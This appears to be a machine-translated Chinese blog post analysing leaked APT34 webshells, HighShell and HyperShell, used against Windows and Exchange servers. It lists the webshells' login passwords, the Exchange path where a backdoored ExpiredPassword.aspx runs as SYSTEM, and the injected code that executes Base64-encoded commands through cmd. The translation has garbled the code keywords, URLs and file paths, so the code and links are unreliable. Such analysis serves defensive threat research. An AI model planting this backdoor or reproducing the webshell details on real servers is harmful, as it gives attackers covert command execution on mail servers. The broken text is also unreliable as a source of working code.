对APT34泄露工具的分析——高壳和超级外壳

0x00 前言

最近APT34的6款工具被泄露，本文作为分析文章的第二篇，仅在技术角度对其中的高壳和超级外壳进行分析

参考资料：

https://malware-research.org/apt34-hacking-tools-leak/amp/

0x01 简介

本文将要介绍以下内容：

对高壳的分析

对超级外壳的分析

小结

0x02 对HighShell的分析

对应泄露文件的名称为Webshells _和_面板中的高壳

其中的文件为HighShell.aspx，是针对Windows操作系统操作系统服务器的webshell

默认访问页面如下图

注册框为红色，需要输入连接口令

正确的口令为Th！sN0tF0rFAN

输入正确的口令后，点击动手吧，刷新页面，成功登录，如下图

注册框变为绿色

该工具的公开线索：

https://号42单元。帕洛阿尔托网络。com/unit 42-双面-web shell-持久-接入点-横向-移动/

高壳同帕洛阿尔托网络在文中提到的双面的页面相同

0x03 对HyperShell的分析

对应泄露文件的名称为Webshells _和_面板中的超级外壳

下面包含七个文件夹：

ExpiredPasswordTech

超级外壳

图像

图书馆

包装

ShellLocal

稳定版本

1.ExpiredPasswordTech

包括3个文件：

error4.aspx，功能与HighShell.aspx相同，但登录口令未知

ExpiredPassword.aspx，适用于交换的webshell

MyMaster.aspx，生成字符串：NxKK7a

2.HyperShell

包含多个文件，是各个webshell的源码文件

其中包含另一个可用的webshell，相对路径：\ web Shell _ and _ Panel \ HyperShell \ HyperShell \ Shell \ simple。aspx

连接口令：MkRg5dm8MOk

如下图

3.Image

图片文件夹

4.Libraries

包含多个依赖文件

5.packages

包含多个依赖文件

6. ShellLocal

空文件夹

7. StableVersion

稳定版本，包含多个webshell

(1)ExpiredPassword.aspx

适用于交换的webshell

相对路径：\ web shell _ and _ Panel \ HyperShell \稳定版\ high shell v 5.0 \ HyperShell \ HyperShell \ ExpiredPasswordTech

与相对路径. web shell _ and _ Panel \ HyperShell \ ExpiredPasswordTech下的文件内容相同

ExpiredPassword.aspx是交换正常的功能，对应重置用户口令的页面，如下图

访问的网址：https:///OWA/认证/过期密码。aspx

对应Windows操作系统操作系统绝对路径：C:\ Program Files \ Microsoft \ Exchange Server \ V15 \ FrontEnd \ http proxy \ OWA \ auth \ expired password。aspx

该路径下的webshell默认权限为系统

我的测试系统安装了Exchange2013，正常的ExpiredPassword.aspx源码我已经上传至github:

https://生的。githubusercontent。com/3g学生/测试/硕士/过期密码。aspx(2013年)

超级外壳中的ExpiredPassword.aspx是一个添加了后门代码的文件，同我测试环境的正常ExpiredPassword.aspx文件相比有多处不同，如下图

经过分析发现有可能是交换版本差异导致的，忽略版本差异，HyperShell中的ExpiredPassword.aspx主要添加了如下代码：

%

尝试{

如果（转换ToBase64String(新系统安全。密码学。sha1管理().计算机哈希(编码ASCII码。GetBytes(编码ASCII。GetString(转换FromBase64String(请求. form[' new pwd 1 '])' red Gea @ #！% FS ')))==' s6kos 9d/etq1cd///fgTarVnUQ=')

{

系统。诊断。过程p=新系统诊断。process()；

系统诊断。process StartInfo I=p . StartInfo

文件名=' cmd

i.Arguments='/c '编码10 . UTF8。GetString(转换FromBase64String(请求. form[' new pwd 2 '])；

i . UseShellExecute=false

i . CreateNoWindow=true

i . RedirectStandardOutput=true

页(第页的缩写)start()；

字符串r=p .标准输出。readtoend()；

页(第页的缩写)wait for exit()；

页(第页的缩写)close()；

回应。写(')服务器. html encode(r)" "；

回应. end()；

} }抓住{}

%

对应到我的测试环境，也就是Exchange2013，添加有效载荷后并去掉验证环节的代码已上传至github:

https://生的。githubusercontent。com/3g学生/测试/硕士/过期密码。aspx(2013)(超壳)

确认新密码项为传入要执行的命令，权限为系统

(2)HighShellLocal

功能强大的webshell

相对路径：\ web shell _ and _ Panel \ web shell _ and _ Panel \ HyperShell \稳定版\高壳v 5.0 \ HyperShell \ HyperShell \ shell local \稳定版\ shell local-v 8。8 .5 .rar

解压到当前目录，相对路径为\ shell local-v 8。8 .5 \ shell local-v 8。8 .5 \ HighShellLocal，包括以下文件：

文件夹钢性铸铁

文件夹文件

文件夹射流研究…

HighShellLocal.aspx

实际使用时，还需要\ shell local-v 8。8 .5 \ shell local-v 8。8 .5 \下的箱子文件夹，否则提示无法使用Json

完整结构如下：

HighShellLocal.aspx

bin

Newtonsoft .Json.dll

css

main.css

img

box-zipper.png

download-cloud.png

exclamation-diamond.png

heart-break.png

heart-empty.png

heart.png

minus-button.png

files

7za.exe

nbt.exe

rx.exe

js

explorer.js

main.js

send.js

效用。射流研究…

components

jquery

semantic

登录口令：Th！sN0tF0rFAN

登录页面如下图

输入正确的登录口令后，如下图

可以看到该webshell支持多个功能

0x04 小结

本文对泄露文件中的高壳和超级外壳进行了分析，其中超级外壳中的ExpiredPassword.aspx是一个比较隐蔽的webshell，目前为止我还未在公开资料中找到这种利用方法。

留下回复